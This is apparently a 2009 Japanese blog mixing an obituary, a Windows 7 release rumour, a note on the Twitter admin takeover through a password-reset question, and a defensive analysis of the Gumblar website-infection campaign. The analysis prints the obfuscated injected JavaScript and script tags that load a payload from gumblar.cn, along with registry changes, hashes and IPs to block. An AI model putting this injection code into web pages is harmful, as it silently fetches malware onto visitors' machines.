UnderForge of Lack

http://www.youtube.com/watch?v=xl87agHPz7M


I'd say thanks... however still can't believe.


＜訃報＞忌野清志郎さん５８歳＝ロック歌手　がん治療続け

http://www.youtube.com/watch?v=yEAL76iddxY


"Heaven" exactly exist for you. Please be safe, and rest forever. Thanks again.

ギャンブラーはちょっと置いときまして・・・

Password != secure
Twitterのクラッキングに使用された Admin用 I/F IDのパスワードをどうやって入手したか？という話・・・

「アドミンの一人は Yahooのアカウントを持っていました。私はシークレットクエスチョン（注釈：パスワードを忘れた際の予備質問）を使用してパスワードの変更を行いました。そしたら、パスワードがメールボックスに入っていました。」

ソーシャルエンジニアリングと正確な予測は、いつもセキュリティへの悪手と成り得ます。Twitterへの侵入は、残念ながらそれを証明する結果となりました。ハッキングは必要ないのです。あなた方の大部分はそのことをご存知でしょうから、これいじょう言う必要なないでしょうが・・・

娘の名前を入れてるヒト、前に出なさい（苦笑）

実ファイル検査結果：

Analysis Report for gumblar.exe
Registry Values Modified:
HKLM\SoFtWARE\Microsoft\Windows nT\currentversion\Drivers32
- AUX to C:\..\kft.blc

Files drop:
C:\DOCUME~1\user\LOCALS~1\Temp\667a_appcompat.txt
C:\kft.blc

Files Modified:
C:\DOCUME~1\user\LOCALS~1\Temp\667a_appcompat.txt
C:\WINDOWS\system32\sqlsodbc.chm
C:\kft.blc

Processes Created:
C:\WINDOWS\system32\dwwin.exe
C:\WINDOWS\system32\dwwin.exe -x -s 156

Files Deleted (dwwin.exe):
C:\DOCUME~1\user\LOCALS~1\Temp\1EC3BB.dmp
C:\DOCUME~1\user\LOCALS~1\Temp\667a_appcompat.txt

Files Created (dwwin.exe):
C:\DOCUME~1\user\LOCALS~1\Temp\1EC3BB.dmp

Files Modified (dwwin.exe):
C:\DOCUME~1\user\LOCALS~1\Temp\1EC3BB.dmp

Registry Keys Created (service.exe):
HKLM\System\CurrentControlSet\Enum\Root\LEGACY_TAPISRV000\Control
HKLM\System\CurrentControlSet\Enum\Root\LEGACY_RASMAN000\Control

Registry Values Modified (service.exe):
HKLM\System\CurrentControlSet\Enum\Root\LEGACY_RASMAN000\Control
- ActiveService to RasMan
HKLM\System\CurrentControlSet\Enum\Root\LEGACY_TAPISRV000\Control
- ActiveService to TapiSrv

基本的にはzlkonのコレとあまり変わってないようです。

例によって "AUX=" に "kft.blc" という怪しげなファイルを投下していますが、このファイルは恐らくランダムです。

そして（たぶん）キーログ情報のコンテナに "sqlsodbc.chm" を使用しています。

あと、噂されていた画面キャプチャの送信用かな？と思われる 1EC3BB.dmp というファイルへの書き込みが顕著ですね。

gumblar.exe (4/39)

MD5: 29148682df9c5a693b35b2b4529925b2

----------
SWFの方は、wepawetが「解析不能だけどVirusTotalでMalicious判定されてるよ」と返してきました（笑）

Analysis report for 5ae22276f03881082a2956b062ad0d3f.swf

gumblar.swf (4/40)

MD5: 5ae22276f03881082a2956b062ad0d3f

----------
PDFは入手できてません・・誰かクダサイ（笑）

Analysis report for .....

document.write("＜script src=／／gumblar。cn／rss／?id=" + j + "＞＜\/script＞

＜script src=／／gumblar。cn／rss／?id＞＜/script＞

連休前なので放置される可能性が高いですね

----------
Google先生がBlockしました

gumblar.cn の診断ページ
17 個のドメインを感染させています。


Norton 評価 : gumblar.cn
安全
そうですヵ

McAfee Site Advisor -- gumblar。cn
このサイトは検査待ち :: 協力者によるレビュー : Malware! Stay away...

* gumblar.cn 騒ぎの基点 *

gumblar。cnで調べていたら

Analysis report for .......

＜script src=／／gumblar。cn／rss／?id=＞＜/script＞


TOP PAGE_html : MD5:086a0a345ffb0920c7b7d4db3893b6a2 (3/37)
＜!--
(ｆunction(t){ｅval(ｕnescape(('var#20a#3d#22S#63ript#45ngine
#22#2cb#3d#22Ver#73ion(#29+#22#2cj#3d#22#22#2cu#3dnav#69#67at
#6fr#2e#75se#72#41gen#74#3bi#66#28(u#2eind#65x#4ff(#22Win#22)
#3e0)#26#26#28u#2ei#6e#64#65xO#66(#22NT#206#22#29#3c0)#26#26(
#64ocume#6e#74#2ecookie#2e#69ndexOf#28#22m#69#65k#3d1#22)#3c
#30)#26#26(#74ypeof(zrvzts#29#21#3dtyp#65of(#22#41#22#29))#7
bzrvz#74s#3d#22A#22#3b#65val(#22if(window#2e#22+a+#22)j#3dj+#
22+a#2b#22Major#22+b+a+#22Minor#22+#62#2ba+#22Bui#6c#64#22#2b
b+#22j#3b#22)#3b#64ocum#65n#74#2ewrite(#22#3cs#63ri#70t#20#73
r#63#3d#2f#2fgu#6dbl#61r#2e#63n#2frs#73#2f#3fi#64#3d#22+#6a+#2
2#3e#3c#5c#2fs#63r#69pt#3e#22#29#3b#7d').
ｒeplace(t,'%')))})(/#/g);
--＞

他にもまだあるかもしれませんので注意を

Block:
94.229.65.172 正引きが復活してきました

inetnum: 94.229.65.160 - 94.229.65.191
netname: LIMIT-SUREHOST-IP-3
descr: LIMIT SUREHOST IP RANGE 3
country: RU
狭くて不安ってヒトは

route: 94.229.64.0/20 (94.229.64.0 - 94.229.79.255)
descr: UK Dedicated Servers Limited
origin: AS42831
mnt-by: UKSERVERS-MNT
source: RIPE # Filtered

zlkon(ウクライナグループ）が封鎖されたので、散布元を変えてきた可能性もあります。

----------
レジストラ:
Registrant Organization: NetworkProtect
Registrant Name: TiankaiCui
Administrative Email: cuitiankai＠googlemail.com

MDL(Malware Domain List)での検索結果：
Result : "cuitiankai" DESC

2009/04/12_00:00 botlife。cn／stats。php 94.247.2.57 hs.2-57.zlkon.lv exploits/trojan TiankaiCui cuitiankai@googlemail.com

をい（笑）

見たこと無いですし、見たいとも思いませんが、この世で最もひどいといわれてるビデオ映像があるそうでして・・
2 Girls 1 Cup
なんか、コレを見たときのリアクションを映像に撮ってYouTubeに流すのが流行った時期が数年前にあったそうです（笑）いわいる「精神的ブラクラ」ってヤツですね。

まぁ、そんな危険な映像に興味をもたないように！とパンツが警告しています。
Viral Video Now Just Viral
In fact, there are actually hundreds of compromised domains across the internet which we’ve seen over the last few days that have been infected. It seems some obfuscated javascript is being injected into these sites, which attempts to redirect the user to another domain hosting a malicious payload.



なんかとっても強いデジャブを感じますね、これ・・

script src=／／gumblar。cn／rss／?id="+j+"

現在はこのドメインは正引き不可ですが、中身は Troj/SWFLdr-A コレだったそうです。誘導元の JavaScriptは Troj/JSRedir-Rとして検出しています。

-----------
このウィルス・インジェクションですが、最初に検出したのは Avast! らしいです。

Beware of the threat from hacked websites


この感染サイト・・・派手すぎるのでリンクは貼りません（笑）

どういう意図のリークなのかはわかりませんが

Windows 7、正式発売は10月23日になるとの情報も--英報道
Acer UKのマーケティングディレクターであるBobby Watkins氏は、現地時間4月30日にPocket-lint.comに対して、Windows 7のリリースが今秋に予定されていると語った。

Watkins氏は「Windows 7が正式にリリースされるのは、10月23日となるだろう。30日間のアップグレード期間が定められるため、新しいPCの買い控えは起きないはずだ。このアップグレード期間中にPCを購入すれば、Windows 7へと無料でアップグレードできる」と語ったと伝えられている。

ついさっき、 7/1 まで待ってって書いたような気もするけど・・忘れてください（苦笑）

この記事のソースになってるココでは
Acer confirms Windows 7 available 23 October -- Pocket-lint.com
Acer has confirmed that Windows 7 will be available pre-loaded on their new all-in-one Z5600 PC from the 23 October 2009, not by the end of January 2010 as Microsoft has been previously suggesting.
となっていますので、バルマーMicrosoft的な確約はともかく、Acerとしては自信があるんでしょう。

"23rd October is the date the Windows 7 will be available. There is a 30 day upgrade time so that customers don't wait to buy a new computer, so if you buy during that 30 day period, you'll get a free upgrade to Windows 7"

ってことは 9/23までは買い控えが起こる可能性が高いってことになってしまいますね。

さて・・真相は如何？